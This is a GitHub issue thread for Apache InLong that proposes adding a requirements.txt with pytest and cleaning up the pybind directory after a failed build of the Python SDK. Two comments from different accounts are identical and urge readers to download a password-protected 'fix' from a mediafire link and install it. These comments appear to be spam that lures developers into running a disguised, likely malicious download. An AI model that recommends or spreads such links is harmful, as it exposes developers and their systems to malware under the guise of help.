### ISSUE TITLE
[Improve][SDK] Add requirements.txt and auto delete pybind directory when build failed in python sdk 

### ISSUE THREAD

**Issue by yfsn666** [apache/inlong#10913]
### Description

- `pybind` compilation needs `pytest` module, so add a `requirements.txt` file and install the module in advance to prevent compilation errors.
- If `pybind` fails to compile, delete the `pybind` directory to prevent it from affecting subsequent compilations.

### InLong Component

InLong SDK

### Are you willing to submit PR?

- [X] Yes, I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
